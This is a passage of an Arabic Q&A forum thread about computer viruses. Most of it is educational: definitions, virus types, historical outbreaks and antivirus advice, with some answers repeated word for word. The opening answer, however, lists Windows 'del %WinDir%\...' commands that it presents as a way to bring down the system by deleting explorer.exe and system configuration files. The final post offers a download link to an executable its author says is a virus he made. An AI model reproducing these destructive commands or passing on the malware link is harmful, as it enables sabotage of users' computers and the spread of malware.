دلوقتى أكيد انتم فهمتم الفكرة كلها احنا دلوقتى جوة الويندوز نقدر نمسح الى عايزينه و 90% منها ملفات حساسة يعنى التخريب هيتم

ودى بعض الاكواد لإسقاط الويندوز

del %WinDir%\explorer.exe
del %WinDir%\NOTEPAD.EXE
del %WinDir%\ISUninst.exe
del %WinDir%\wjview.exe
del %WinDir%\win.ini
del %WinDir%\system.ini

وطبعا أكيد كلكم عارفين أماكن الملفات التانية الحساسة


الحماية والوقاية من هذا النوع من الفيروسات

تحميل برنامج الكاسبر سكاى انتى فيروس فهو من البرامج القلية التى تحدد هذا النوع نت الفيروسات
20‏/6‏/2012 تم النشر بواسطة Abo-azam.
38 من 44
رح جاوبك عالقسم الثاني
نعم نقدر التخلص منهم عبر برامج مضادة للفيروسات اشهرها كاسبر سكاي المدفوع
والافاست المجاني
20‏/6‏/2012 تم النشر بواسطة amjad alassar (سورية سورية).
39 من 44
ان غشاش وعندك واسطة ياغشاش
20‏/6‏/2012 تم النشر بواسطة الشهاب البعيد (كابا سينا).
40 من 44
فيروس الحاسوب هو برنامج خارجي صنع عمداً بغرض تغيير خصائص الملفات التي يصيبها لتقوم بتنفيذ بعض الأوامر إما بالإزالة أو التعديل أو التخريب و ما شابهها من عمليات. اي ان فيروسات الكومبيوتر هي برامج تتم كتابتها بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه، وتتم كتابتها بطريقة معينة.

يتصف فيروس الحاسب بأنه :

1– برنامج قادر على التناسخ Replication والانتشار. 2- الفيروس يربط نفسه ببرنامج أخر يسمى الحاضن host . 3-لا يمكن أن تنشأ الفيروسات من ذاتها . 4-يمكن أن تنتقل من حاسوب مصاب لآخر سليم . يتكون برنامج الفيروس بشكل عام من أربعة أجزاء رئيسية وهي : 1-آلية التناسخ The Replication Mechanism :

وهو الجزء الذي يسمح للفيروس أن ينسخ نفسه .

2-آلية التخفي The Protection Mechanism :

وهو الجزء الذي يخفي الفيروس عن الاكتشاف.

3- آلية التنشيط The trigger Mechanism :

وهو الجزء الذي يسمح للفيروس بالانتشار قبل أن يعرف وجوده كاستخدام توقيت   الساعة في الحاسوب كما في فيروس (Michelangelo) الذي ينشط في السادس من   آذار من كل عام .

4- آلية التنفيذ The Payload Mechanism :

وهو الجزء الذي ينفذ الفيروس عندما يتم تنشيطه .

طرق انتقال الفيروسات (العدوى): يمكن أن نميز فئتين من فيروسات الحاسوب تبعاً لآلية العدوى وانتشار الفيروس :

.1فيروس العدوى المباشر Direct Infector :

عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس يبحث بنشاط عن ملف أو أكثر لينقل العدوى إليه, وعندما يصاب أحد الملفات بالعدوى فإنه يقوم بتحميله إلى الذاكرة وتشغيله ,وهذا النوع قليل الانتشار.

• 2.- فيروس العدوى غير المباشر Indirect Infector : • عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس سينتقل إلى ذاكرة الحاسوب ويستقر فيها, ويتم تنفيذ البرنامج الأصلي ثم يصيب الفيروس بالعدوى كل برنامج يتم تحميله إلى الذاكرة بعد ذلك, إلى أن يتم قطع التغذية الكهربائية عن الحاسوب أو إعادة تشغيله



أنواع الفيروسات

أنواع الفيروسات ثلاثة :(الفيروس والدودة وحصان طروادة) ما الفرق بين الفيروس والدودة وحصان طروادة؟

•الفيروس: يمكن القول بأنه برنامج تنفيذي(ذات نوع scr,.pif,.bat,.exe ,.com.) يعمل بشكل منفصل ويهدف إلى أحداث خلل في نظام الحاسوب وتترواح خطورتة حسب مهمته فمنه الخطير ومنه الخفيف وكلاهما خبيث.وينتقل بواسطة نسخ الملفات من جهاز به ملفات مصابة إلى جهاز اخر عن طريق الاقراص المدمجة سي دي و ذواكر الفلاش .

•الدودة (worm ): فيروس ينتشر فقط عبر الشبكات والانترنت ويعمل على الانتشار على الشبكات عن طريق دفتر عنواين البريد الالكتروني مثلا فعند اصابة الجهاز يبحث البرنامج الخبيث عن عناوين الاشخاص المسجلين في دفتر العناوين على سبيل المثال ويرسل نفسه إلى كل شخص وهكذا ... مما يؤدي إلى انتشاره بسرعه عبر الشبكه وقد اختلف الخبراء فمنهم اعتبره فايروس ومنهم من اعتبره برنامج خبيث وذلك كون الدوده لاتنفذ اي عمل مؤذي انما تنتشر فقط مما يؤدي إلى اشغال موارد الشبكه بشكل كبير ومع التطور الحاصل في ميدان الحوسبه أصبح بامكان المبرمجين الخبيثين إضافة سطر برمجي لملف الدوده بحيث تؤدي عمل معين بعد انتشارها ( مثلا بعد الانتشار إلى عدد 50000 جهاز يتم تخريب الأنظمة في هذه الأجهزة ) أو اي شيء اخر ( مثلا في يوم معين أو ساعة أو تاريخ ...الخ ) وأصبحت الديدان من أشهر الفيروسات على الشبكه العالميه واشهر عملياتها التخريبيه واخطرها تلك التي يكون هدفها حجب الخدمه تسمى ( هجمات حجب الخدمه ) حيث تنتشر الدوده على عدد كبير من الأجهزة ثم توجه طلبات وهميه لجاهز خادم معين ( يكون المبرمج قد حدد الخادم المستهدف من خلال برمجته للدوده ) فيغرق الخادم بكثرة الطلبات الوهميه ولا يستطيع معالجتها جميعا مما يسبب توقفه عن العمل وهذه الديدان استهدفت مواقع لكثير من الشركات العالميه اشهرها مايكروسوفت وغيرها الكثير .

•حصان طروادة Trojan Horse: سمي هذا الفيروس بحصان طروادة لانه يذكر بالقصة الشهيرة لحصان طروادة حيث اختبأ الجنود اليونان داخله واستطاعوا اقتحام مدينة طرواده والتغلب على جيشها وهكذا تكون الية عمل هذا الفيروس حيث يكون مرفقا مع أحد البرامج أي يكون جزء من برنامج دون ان يعلم المستخدم. فعندما يبدأ البرنامج تنفيذ عمله ويصل إلى مرحلة ما حيث تم توزيع قرص مجاني على المشافي به برنامج حول مرض الايدز ( اسبابه - طرق انتشاره - طرق العلاج .. الخ ) وبعد مدة شهر من تشغيل البرنامج تم تشفير المعلومات على الحواسب الحاضنه للفايروس وظهرت رساله مفادها ان الحاسب مصاب بالايدز ( المقصود هنا انه تم تشفير ملفات الحاسب وايقافها عن العمل بطريقه نظاميه ) ارسل مبلغ كذا إلى الحساب كذا ليتم إرسال رقم فك الشيفره مما اجبر المختصين بالرضوخ للطلب كونهم لم يستطسعو فك التشفير . توجد عدة تقسيمات للفيروسات، فمثلاً من حيث سرعة الانتشار هناك فيروسات سريعة الانتشار وفيروسات بطيئة الانتشار ومن حيث توقيت النشاط فيروسات تنشط في أوقات محددة وفيروسات دائمة النشاط ومن حيث مكان الإصابة فيروسات مقطع التشغيل boot sector على الأقراص وهي الأكثر شيوعاً، وفيروسات الماكرو macro التي تختص بإصابة الوثائق والبيانات الناتجة عن حزمة مايكروسوفت أوفيس، أما من حيث حجم الضرر فهناك الفيروسات المدمرة للأجهزة طبعا لايوجد فايروسات خارقه بحيث انها تدمر الأجهزة كما نسمع أحيانا ( احترق المعالج بسبب الفايروس تعطلت وحدة التغذيه بسبب الفايروس أو تلفت الشاشة بسبب الفايروس ،... الخ ) ولكن يمكن للفايروس ان يؤذي الذاكره روم في الحاسب كما في فايروس تشرنوبل أو ان يمحي معلومات ال (MBR (Main Boot Sector على القرص الصلب فتعود الاقراص الصلبه كما اتت من المصنع وفي الحالتين السابقتين لا يتم اقلاع الجهاز مما يوحي للبعض ان الفايروس ( حرق ) الحاسب طبعا هذه الفيروسات تعتبر خطيره جدا لانها تتسبب في اتلاف البيانات المخزنه والتي قد تكون (البيانات) نتاج عشرات السنين مما يؤديي إلى خسائر جسيمة أو إلى توقف الحاسبات عن العمل كما في تشرنوبل مما يؤدي إلى توقف الخدمات المقدمه ، وهنالك أيضا الفيروسات المدمرة للبرامج وتاثيرها محدود طالما ان البيانات لم تتاثر حيث يمكن تخزين البيانات واعادة تهئية الحاسب واعادة البرامج المتضرره من اقراصها الاصليه، والفيروسات عديمة الضرر وهي التي لاتقوم باي عمل مؤذي وانما تم برمجتها لاثبات الذات والقدره على البرمجه من بعض المراهقين فمنها ما يرسم كرة أو اي شكل على الشاشه طوال فترة عمل الكمبيوتر ومنها ما يغير بعض الاحرف ( كتغير حرف بحرف اينما وجد ) أو تغيير مؤشر الماوس .. الخ.

فيروس Brontok أو الفيروس الذي يخفي خيارات المجلداو يفقدك التحكم في الرجستري فتصبح غير قادر على التحكم في الحاسوب: هذا الفيروس من أبرز مهامه أنه يقوم بإخفاء خيارات المجلد من قائمة أدوات الموجودة في نظام الويندوز وأيضا يقوم بتكرار جميع المجلدات التي يصيبها حتى أنك لاتعرف الأصل من النسخة وقد تحذف الأصل ظنا منك أنه الفيروس ، وهو أيضا يقوم بفتح شاشة الإنترنت اكسبلورر ويقوم بفتح شاشة خضراء اللون بشكل مستمر ممايسبب بطء في النظام ووما يؤدي ألى زيادة انتشار هذا الفيروس في الكمبيوتر

فيروس xcopy والذي يصيب الـ Partion القسم للقرص الصلب ويجعله لايفتح مباشرة وذلك بزرع ملف auotorun وحينما تحاول فتح القسم يعطيك قائمة فتح باستخدام ولا تستطيع الدخول إلى القسم الذي تريده إلا بطرق ملتوية مثل (استكشاف و تشغيل ) للمحترفين فقط ويقوم أيضا بجعل الفلوبي دسك القرص المرن يصيح باستمرار مطالبا بإدخال قرص مرن للكمبيوتر تصنيف الفيروسات حسب خطورتها : 1- العادي Trivial : لا يفعل الفيروس العادي شيئا سوى التكاثرreplication ولا يسبب أي ضرر أو تخريب للمعلومات مثل فيروس stupid 2- الثانوي Minor : يصيب الملفات التنفيذية فقط executable file ولا يؤثر على البيانات 3- المعتدل Moderate : يقوم بتدمير جميع الملفات الموجودة على القرص إما باستبدال المعلومات بمعلومات لا معنى لها أو عن طريق إعادة التهيئة Reformatting مثل فيروس Disk killer الذي يقوم بإعادة تهيئة القرص . ويمكن حل مشكلة هذه الفيروسات عن طريق استخدام النسخ الاحتياطي 4- الرئيسي Major : يؤدي الفيروس إلى تخريب المعلومات بإجراء تغيرات ذكية وبارعة للبيانات دون أن يترك أثرا يشير إلى التغيير الحاصل كأن يقوم بتبديل كتل المعلومات المتساوية في الطول بين الملفات كما أن تأثيره يكون على المدى الطويل ولن يكون من الممكن اكتشاف الإصابة إلا بعد بضعة أيام وبذالك لا يمكن الوثوق بالنسخة الاحتياطية أيضا . 5- اللامحدود Unlimited : يستهدف الشبكات والملفات المشتركة وتمضي أكثر الوقت في محاولة معرفة كلمة السر للمستخدمين الأكثر فاعلية وعند معرفتها يقوم بتمريرها إلى أحد أو أكثر من مستخدمي الشبكة على أمل أنهم سيستخدمونها لأغراض سيئة . ترينا الفيروسات كم نحن معرضين للهجوم ولكن بالمقابل ترينا مدى التعقيد والترابط الذي وصل إليه الإنسان . على سبيل المثال My doom : قدر الخبراء الحواسيب المتضررة من هذه الدودة بحوالي ربع مليون حاسوب خلال يوم واحد والذي كان في كانون الثاني 2004 Melissa: أعطى هذا الفيروس فاعلية كبيرة جدا حيث أجبر شركة Microsoft والعديد من كبرى الشركات الأخرى على إطفاء مخدمات البريد بشكل كامل حتى تمكنوا من القضاء عليه وذلك في آذار 1999 وفي الشهر الأول من عام 2007 ظهرت دودة اسمها Storm وبحلول الشهر التاسع كان أكثر من 50 مليون حاسوب مصاب . كلنا تصور أن كل هذا التأثير ينتج عن برامج بسيطة جدا. فيروس Melissa : أنشاء الفيروس على شكل مستند Word ووضع في موقع للأخبار عندما يقوم أي شخص بتحميل الملف وفتحه فإن الفيروس يتفعل ويقوم بإرسال المستند إلى أول 50 شخص في الAddress book والمستند يحوي على ملاحظة لطيفة واسم الشخص المرسل إليه وعندما يقوم المرسل إليه بفتح المستند يتم إرساله إلى 50 شخص أخر وبهذه الطريقة أصبح فيروس Melissa أسرع فيروس في الانتشار
20‏/6‏/2012 تم النشر بواسطة اصدق لعاب (ودكم انكم انا).
41 من 44
بسم الله الرحمن الرحيم

ملحوظة: لا يمكن ان اشرح كيف يتم تصنيع الفيروسات فى الاجابة لان هذا مخالف ولكن افيدكم جميعا انشاء الله

اولاً.....    
كيف يتم تصميم فيروسات الكمبيوتر

عن طريق الـNotepad
عن طريق برنامج الفجول بيسك (VB) و ++C
عن طريق برامج تصميم الفيروسات ( خطيرة جدا و فيروساتها قوية – لكن اغلبها يكشفه برامج مكافحة الفيروسات)
_____________________________________________________________________________________
ثانياً....
كيف يمكن التخلص منها ولاكن انا افضل ان الوقايه خير من العلاج

المواجهة مع الفيروسات
كل كمبيوتر معرض للإصابة بالفيروس هذه الأيام، وليس هناك كمبيوتر آمن مائة في المائة· فالفيروسات الجديدة منتشرة الآن على شبكة الإنترنت، بانتظار إيجاد ثغرات تنفد منها، لتدمر الأجهزة والبيانات التي فيها· أما الطريقة المثلى في الوقاية فهي تحميل برنامج مقاوم للفيروسات والقيام بتحديثه من حين إلى آخر، لتكون لديه المناعة الكافية بمواجهة الفيروسات الجديدة· كل ذلك لن يغنيك عن اتخاذ الحيطة والحذر··كما سترى في الموضوع التالي:
كيف تتجنب الفيروسات؟اولا: المسح ضد الفيروسات Virus Scanning : تستطيع أن تقوم بعملية مسح فورية مجانية لكمبيوترك الشخصي ضد الفيروسات من الموقع التالي www.centralcommand.com/ اضغط على الوصلة Free Online Virus Scan لتنتقل الى صفحة جديدة، حيث تقوم بإدخال البيانات الشخصية وبعدها تبدأ عملية الفحص الفوري لجهازك·

ثانيا:
تحميل برنامج مقاوم للفيروسات: الخطوة السابقة المتمثلة في فحص الكمبيوتر فورا عبر الإنترنت، شيء ضروري ومهم، ولكنه لا يغنيك عن تنزيل وتحميل برنامج مقاوم للفيروسات· مثل البرنامج الممتاز AVG الذي تستطيع استدعاءه من الموقع التالي www.grisoft.com/html/us_downl.html وهو برنامج مجاني يقوم بترقية نفسه بنفسه، حسب إعدادك له·

ثالثا:
تصفية Filteringمرفقات البريد الإلكتروني: كما يصفي أحدنا الماء من الشوائب، فانه يستطيع تصفية مرفقات البريد الإلكتروني من الفيروسات· الطريقة المثلى لذلك، هو أن يضع قواعد للبريد الإلكتروني الوارد، بحيث تتوجه الرسائل الواردة مباشرة الى مجلد خاص لتفحصها هناك· تتم هذه العملية في أوت لوك اكسبريس على النحو التالي، اختر Tools Message Rules Mail فتظهر النافذة الخاصة بإعداد القواعد الخاصة بالبريد الإلكتروني·

رابعا:
راقب امتدادات Extensions الملفات المرفقة: تستطيع أن ترصد فيروسا داخل ملف مرفق، إذا دققت في اسم الملف· فإذا كان منتهيا بالامتداد ·VBS فانه سيكون مثار شك وريبة، لأن هذا الاسم لن يكون لملف نصي بالهيئة وورد، وانما ملف فيجوال بيسك سكريبت الذي قد يحتوي على فيروس·

خامسا:
الماكرو فيروس Macro Virus : لسوء الحظ أن مستندات وورد قد تحتوي على فيروسات مختبئة· فاذا كنت تستخدم وورد 2000 فقد تحمي نفسك نسبيا إذا رفعت مؤشر الأمان على النحو التالي، اختر Tools Macro Security ومن النافــــذة الجديدة تأكد بأن المؤشر مرفوع للأعلى High

سادسا:
وقايــــــة كتــــــاب العنــاويــــــــن Address Book في أوت لو اكسبريس 6 تســـتطيع أن توقــــف الفيروســــات، عن نســــــخ نفســــها وإرســــال هــــذه النســـــخ إلى عناويــــن البريد الالكترونيــــة الموجــودة في كتاب العناوين، وذلك على النحو التالي، اختر Tools Options ثم اخـتر التبويبة Security وضــــع علامـــــــة الصــــــــح في المربـــــــــــع الصغــــــــــير بجانــــــــــب العبــــــــــارة Warn me when other applications try to send mail as me

سابعا:
خدمة فورية للقضاء على الفيروسات الخطيرة: إذا شككت بأن كمبيوترك أصيب بفيروس خطير مثل الفيروس نيمدا على سبيل المثال، فاذهب إلى الموقع التالي www.centralcommand.com/jan1.html تجد قائمة بأخطر 12 فيروسا ودودة كمبيوترية، ومن الموقع تحصل على رزمات برمجية للقضاء عليها·

شرح المصطلحات الواردة في الموضوع
1- كتاب العناوين Address Book هو بمثابة سجل يحتوي على عناوين البريد الإلكترونية لأصدقاء أو معارف، بحيث يمكن الرجوع اليه كلما أردت عنوان أحد منهم·

2- التروجان Trojan أي طروادة، وهو الحصان الذي تخفى فيه المهاجمون لدخول القلعة والفتك بأهلها، عبارة عن فيروس متخف في برنامج أو ملف، وهو أخطر أنواع الفيروسات، لأنه يفتك بالكمبيوتر، ولكنه لا ينسخ نفسه ويرسلها إلى كتاب العناوين·

3- مؤشر الأمن Security Level عبارة عــــــن رافعــــــه كلما حركتــــها للأعـــــلى ازدادت مستويات الأمن والسرية، والوقاية من الفيروسات.

ارجو الله ان اكون قد وفقت ..
لكم جميعا تحياتى
واتككم مع ذكر الله لا اله الا الله محمد رسول الله
20‏/6‏/2012 تم النشر بواسطة قضام الرصاص (قضام الرصاص).
42 من 44
فيروس الحاسوب هو برنامج خارجي صنع عمداً بغرض تغيير خصائص الملفات التي يصيبها لتقوم بتنفيذ بعض الأوامر إما بالإزالة أو التعديل أو التخريب وما شابهها من عمليات. اي ان فيروسات الكومبيوتر هي برامج تتم كتابتها بواسطة مبرمجين محترفين بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه أو سرقة بيانات مهمة، وتتم كتابتها بطريقة معينة.
يتصف فيروس الحاسب بأنه :
برنامج قادر على التناسخ Replication والانتشار.
الفيروس يربط نفسه ببرنامج أخر يسمى الحاضن host.
لا يمكن أن تنشأ الفيروسات من ذاتها.
يمكن أن تنتقل من حاسوب مصاب لآخر سليم.
20‏/6‏/2012 تم النشر بواسطة الليل الحزين،،.
43 من 44
فيروس الحاسوب هو برنامج خارجي صنع عمداً بغرض تغيير خصائص الملفات التي يصيبها لتقوم بتنفيذ بعض الأوامر إما بالإزالة أو التعديل أو التخريب و ما شابهها من عمليات. اي ان فيروسات الكومبيوتر هي برامج تتم كتابتها بغرض إلحاق الضرر بكومبيوتر آخر، أو السيطرة عليه، وتتم كتابتها بطريقة معينة.

يتصف فيروس الحاسب بأنه :

1– برنامج قادر على التناسخ Replication والانتشار. 2- الفيروس يربط نفسه ببرنامج أخر يسمى الحاضن host . 3-لا يمكن أن تنشأ الفيروسات من ذاتها . 4-يمكن أن تنتقل من حاسوب مصاب لآخر سليم . يتكون برنامج الفيروس بشكل عام من أربعة أجزاء رئيسية وهي : 1-آلية التناسخ The Replication Mechanism :

وهو الجزء الذي يسمح للفيروس أن ينسخ نفسه .

2-آلية التخفي The Protection Mechanism :

وهو الجزء الذي يخفي الفيروس عن الاكتشاف.

3- آلية التنشيط The trigger Mechanism :

وهو الجزء الذي يسمح للفيروس بالانتشار قبل أن يعرف وجوده كاستخدام توقيت   الساعة في الحاسوب كما في فيروس (Michelangelo) الذي ينشط في السادس من   آذار من كل عام .

4- آلية التنفيذ The Payload Mechanism :

وهو الجزء الذي ينفذ الفيروس عندما يتم تنشيطه .

طرق انتقال الفيروسات (العدوى): يمكن أن نميز فئتين من فيروسات الحاسوب تبعاً لآلية العدوى وانتشار الفيروس :

.1فيروس العدوى المباشر Direct Infector :

عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس يبحث بنشاط عن ملف أو أكثر لينقل العدوى إليه, وعندما يصاب أحد الملفات بالعدوى فإنه يقوم بتحميله إلى الذاكرة وتشغيله ,وهذا النوع قليل الانتشار.

• 2.- فيروس العدوى غير المباشر Indirect Infector : • عندما يتم تنفيذ برنامج مصاب بفيروس من هذا النوع, فإن ذلك الفيروس سينتقل إلى ذاكرة الحاسوب ويستقر فيها, ويتم تنفيذ البرنامج الأصلي ثم يصيب الفيروس بالعدوى كل برنامج يتم تحميله إلى الذاكرة بعد ذلك, إلى أن يتم قطع التغذية الكهربائية عن الحاسوب أو إعادة تشغيله



أنواع الفيروسات

أنواع الفيروسات ثلاثة :(الفيروس والدودة وحصان طروادة) ما الفرق بين الفيروس والدودة وحصان طروادة؟

•الفيروس: يمكن القول بأنه برنامج تنفيذي(ذات نوع scr,.pif,.bat,.exe ,.com.) يعمل بشكل منفصل ويهدف إلى أحداث خلل في نظام الحاسوب وتترواح خطورتة حسب مهمته فمنه الخطير ومنه الخفيف وكلاهما خبيث.وينتقل بواسطة نسخ الملفات من جهاز به ملفات مصابة إلى جهاز اخر عن طريق الاقراص المدمجة سي دي و ذواكر الفلاش .

•الدودة (worm ): فيروس ينتشر فقط عبر الشبكات والانترنت ويعمل على الانتشار على الشبكات عن طريق دفتر عنواين البريد الالكتروني مثلا فعند اصابة الجهاز يبحث البرنامج الخبيث عن عناوين الاشخاص المسجلين في دفتر العناوين على سبيل المثال ويرسل نفسه إلى كل شخص وهكذا ... مما يؤدي إلى انتشاره بسرعه عبر الشبكه وقد اختلف الخبراء فمنهم اعتبره فايروس ومنهم من اعتبره برنامج خبيث وذلك كون الدوده لاتنفذ اي عمل مؤذي انما تنتشر فقط مما يؤدي إلى اشغال موارد الشبكه بشكل كبير ومع التطور الحاصل في ميدان الحوسبه أصبح بامكان المبرمجين الخبيثين إضافة سطر برمجي لملف الدوده بحيث تؤدي عمل معين بعد انتشارها ( مثلا بعد الانتشار إلى عدد 50000 جهاز يتم تخريب الأنظمة في هذه الأجهزة ) أو اي شيء اخر ( مثلا في يوم معين أو ساعة أو تاريخ ...الخ ) وأصبحت الديدان من أشهر الفيروسات على الشبكه العالميه واشهر عملياتها التخريبيه واخطرها تلك التي يكون هدفها حجب الخدمه تسمى ( هجمات حجب الخدمه ) حيث تنتشر الدوده على عدد كبير من الأجهزة ثم توجه طلبات وهميه لجاهز خادم معين ( يكون المبرمج قد حدد الخادم المستهدف من خلال برمجته للدوده ) فيغرق الخادم بكثرة الطلبات الوهميه ولا يستطيع معالجتها جميعا مما يسبب توقفه عن العمل وهذه الديدان استهدفت مواقع لكثير من الشركات العالميه اشهرها مايكروسوفت وغيرها الكثير .

•حصان طروادة Trojan Horse: سمي هذا الفيروس بحصان طروادة لانه يذكر بالقصة الشهيرة لحصان طروادة حيث اختبأ الجنود اليونان داخله واستطاعوا اقتحام مدينة طرواده والتغلب على جيشها وهكذا تكون الية عمل هذا الفيروس حيث يكون مرفقا مع أحد البرامج أي يكون جزء من برنامج دون ان يعلم المستخدم. فعندما يبدأ البرنامج تنفيذ عمله ويصل إلى مرحلة ما حيث تم توزيع قرص مجاني على المشافي به برنامج حول مرض الايدز ( اسبابه - طرق انتشاره - طرق العلاج .. الخ ) وبعد مدة شهر من تشغيل البرنامج تم تشفير المعلومات على الحواسب الحاضنه للفايروس وظهرت رساله مفادها ان الحاسب مصاب بالايدز ( المقصود هنا انه تم تشفير ملفات الحاسب وايقافها عن العمل بطريقه نظاميه ) ارسل مبلغ كذا إلى الحساب كذا ليتم إرسال رقم فك الشيفره مما اجبر المختصين بالرضوخ للطلب كونهم لم يستطسعو فك التشفير . توجد عدة تقسيمات للفيروسات، فمثلاً من حيث سرعة الانتشار هناك فيروسات سريعة الانتشار وفيروسات بطيئة الانتشار ومن حيث توقيت النشاط فيروسات تنشط في أوقات محددة وفيروسات دائمة النشاط ومن حيث مكان الإصابة فيروسات مقطع التشغيل boot sector على الأقراص وهي الأكثر شيوعاً، وفيروسات الماكرو macro التي تختص بإصابة الوثائق والبيانات الناتجة عن حزمة مايكروسوفت أوفيس، أما من حيث حجم الضرر فهناك الفيروسات المدمرة للأجهزة طبعا لايوجد فايروسات خارقه بحيث انها تدمر الأجهزة كما نسمع أحيانا ( احترق المعالج بسبب الفايروس تعطلت وحدة التغذيه بسبب الفايروس أو تلفت الشاشة بسبب الفايروس ،... الخ ) ولكن يمكن للفايروس ان يؤذي الذاكره روم في الحاسب كما في فايروس تشرنوبل أو ان يمحي معلومات ال (MBR (Main Boot Sector على القرص الصلب فتعود الاقراص الصلبه كما اتت من المصنع وفي الحالتين السابقتين لا يتم اقلاع الجهاز مما يوحي للبعض ان الفايروس ( حرق ) الحاسب طبعا هذه الفيروسات تعتبر خطيره جدا لانها تتسبب في اتلاف البيانات المخزنه والتي قد تكون (البيانات) نتاج عشرات السنين مما يؤديي إلى خسائر جسيمة أو إلى توقف الحاسبات عن العمل كما في تشرنوبل مما يؤدي إلى توقف الخدمات المقدمه ، وهنالك أيضا الفيروسات المدمرة للبرامج وتاثيرها محدود طالما ان البيانات لم تتاثر حيث يمكن تخزين البيانات واعادة تهئية الحاسب واعادة البرامج المتضرره من اقراصها الاصليه، والفيروسات عديمة الضرر وهي التي لاتقوم باي عمل مؤذي وانما تم برمجتها لاثبات الذات والقدره على البرمجه من بعض المراهقين فمنها ما يرسم كرة أو اي شكل على الشاشه طوال فترة عمل الكمبيوتر ومنها ما يغير بعض الاحرف ( كتغير حرف بحرف اينما وجد ) أو تغيير مؤشر الماوس .. الخ.

فيروس Brontok أو الفيروس الذي يخفي خيارات المجلداو يفقدك التحكم في الرجستري فتصبح غير قادر على التحكم في الحاسوب: هذا الفيروس من أبرز مهامه أنه يقوم بإخفاء خيارات المجلد من قائمة أدوات الموجودة في نظام الويندوز وأيضا يقوم بتكرار جميع المجلدات التي يصيبها حتى أنك لاتعرف الأصل من النسخة وقد تحذف الأصل ظنا منك أنه الفيروس ، وهو أيضا يقوم بفتح شاشة الإنترنت اكسبلورر ويقوم بفتح شاشة خضراء اللون بشكل مستمر ممايسبب بطء في النظام ووما يؤدي ألى زيادة انتشار هذا الفيروس في الكمبيوتر

فيروس xcopy والذي يصيب الـ Partion القسم للقرص الصلب ويجعله لايفتح مباشرة وذلك بزرع ملف auotorun وحينما تحاول فتح القسم يعطيك قائمة فتح باستخدام ولا تستطيع الدخول إلى القسم الذي تريده إلا بطرق ملتوية مثل (استكشاف و تشغيل ) للمحترفين فقط ويقوم أيضا بجعل الفلوبي دسك القرص المرن يصيح باستمرار مطالبا بإدخال قرص مرن للكمبيوتر تصنيف الفيروسات حسب خطورتها : 1- العادي Trivial : لا يفعل الفيروس العادي شيئا سوى التكاثرreplication ولا يسبب أي ضرر أو تخريب للمعلومات مثل فيروس stupid 2- الثانوي Minor : يصيب الملفات التنفيذية فقط executable file ولا يؤثر على البيانات 3- المعتدل Moderate : يقوم بتدمير جميع الملفات الموجودة على القرص إما باستبدال المعلومات بمعلومات لا معنى لها أو عن طريق إعادة التهيئة Reformatting مثل فيروس Disk killer الذي يقوم بإعادة تهيئة القرص . ويمكن حل مشكلة هذه الفيروسات عن طريق استخدام النسخ الاحتياطي 4- الرئيسي Major : يؤدي الفيروس إلى تخريب المعلومات بإجراء تغيرات ذكية وبارعة للبيانات دون أن يترك أثرا يشير إلى التغيير الحاصل كأن يقوم بتبديل كتل المعلومات المتساوية في الطول بين الملفات كما أن تأثيره يكون على المدى الطويل ولن يكون من الممكن اكتشاف الإصابة إلا بعد بضعة أيام وبذالك لا يمكن الوثوق بالنسخة الاحتياطية أيضا . 5- اللامحدود Unlimited : يستهدف الشبكات والملفات المشتركة وتمضي أكثر الوقت في محاولة معرفة كلمة السر للمستخدمين الأكثر فاعلية وعند معرفتها يقوم بتمريرها إلى أحد أو أكثر من مستخدمي الشبكة على أمل أنهم سيستخدمونها لأغراض سيئة . ترينا الفيروسات كم نحن معرضين للهجوم ولكن بالمقابل ترينا مدى التعقيد والترابط الذي وصل إليه الإنسان . على سبيل المثال My doom : قدر الخبراء الحواسيب المتضررة من هذه الدودة بحوالي ربع مليون حاسوب خلال يوم واحد والذي كان في كانون الثاني 2004 Melissa: أعطى هذا الفيروس فاعلية كبيرة جدا حيث أجبر شركة Microsoft والعديد من كبرى الشركات الأخرى على إطفاء مخدمات البريد بشكل كامل حتى تمكنوا من القضاء عليه وذلك في آذار 1999 وفي الشهر الأول من عام 2007 ظهرت دودة اسمها Storm وبحلول الشهر التاسع كان أكثر من 50 مليون حاسوب مصاب . كلنا تصور أن كل هذا التأثير ينتج عن برامج بسيطة جدا. فيروس Melissa : أنشاء الفيروس على شكل مستند Word ووضع في موقع للأخبار عندما يقوم أي شخص بتحميل الملف وفتحه فإن الفيروس يتفعل ويقوم بإرسال المستند إلى أول 50 شخص في الAddress book والمستند يحوي على ملاحظة لطيفة واسم الشخص المرسل إليه وعندما يقوم المرسل إليه بفتح المستند يتم إرساله إلى 50 شخص أخر وبهذه الطريقة أصبح فيروس Melissa أسرع فيروس في الانتشار
11‏/11‏/2012 تم النشر بواسطة saad djboy.
44 من 44
انا الهاكر الجزائري ( الجوكر ) صممت هذا الفيروس ورفعته على النت اذا اردت ان تحمله هذا هو الرابط
http://www.mediafire.com/download/t2er6l1clqqagjs/dananir.EXE‏
24‏/6‏/2013 تم النشر بواسطة الجوكر الهاكر.
قد يهمك أيضًا
فيروسات الكمبيوتر ؟؟؟؟؟
لماذا ومن اوجد فيروسات الكمبيوتر ؟ وهل تحتاج ايضا إلى حماية ؟
ما افضل برنامج الكمبيوتر
ubuntu linuxهيا الفيروسات بتخش عليه؟
كيف يتم تصميم خطوط الكمبيوتر
تسجيل الدخول
عرض إجابات Google في:: Mobile | كلاسيكي
©2014 Google - سياسة الخصوصية - مساعدة